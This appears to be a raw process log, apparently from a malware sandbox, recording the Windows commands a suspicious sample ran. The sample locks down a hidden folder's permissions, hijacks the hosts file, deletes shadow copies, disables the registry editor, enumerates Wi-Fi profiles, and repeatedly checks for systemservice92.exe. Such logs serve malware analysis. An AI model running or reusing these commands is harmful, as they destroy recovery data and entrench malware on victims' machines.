C:\Windows\system32\cmd.exe /c "icacls "C:\Users\windowssystem" /deny *S-1-1-0:(D)"

C:\Windows\system32\icacls.exe

icacls "C:\Users\windowssystem" /deny *S-1-1-0:(D)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "icacls "C:\Users\windowssystem" /deny *S-1-5-32-544:(D)"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\icacls.exe

icacls "C:\Users\windowssystem" /deny *S-1-5-32-544:(D)

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "icacls "C:\Users\windowssystem" /deny *S-1-5-32-545:(D)"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\icacls.exe

icacls "C:\Users\windowssystem" /deny *S-1-5-32-545:(D)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c takeown /f C:\Windows\System32\drivers\etc\hosts

C:\Windows\SYSTEM32\setx.exe

setx PATH "C:\$Sys-Manager;C:\Users\Admin\AppData\Local\Temp\_MEI1122\pywin32_system32;C:\Users\Admin\AppData\Local\Temp\_MEI47442\pywin32_system32;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\dotnet\;C:\Users\Admin\AppData\Local\Microsoft\WindowsApps;"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKLM\SYSTEM\CurrentControlSet\Control\Power /v PowerButtonAction /t REG_DWORD /d 0 /f"

C:\Windows\SYSTEM32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\reg.exe

reg add HKLM\SYSTEM\CurrentControlSet\Control\Power /v PowerButtonAction /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\System32\drivers\etc\hosts /remove "NT AUTHORITY\TrustedInstaller"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\etc\hosts /remove "NT AUTHORITY\TrustedInstaller"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Checkpoint-Computer -Description \"Windows Update\" -RestorePointType \"MODIFY_SETTINGS\""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "echo %COMPUTERNAME%"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "echo %USERNAME%"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show interfaces"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\netsh.exe

netsh wlan show interfaces

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

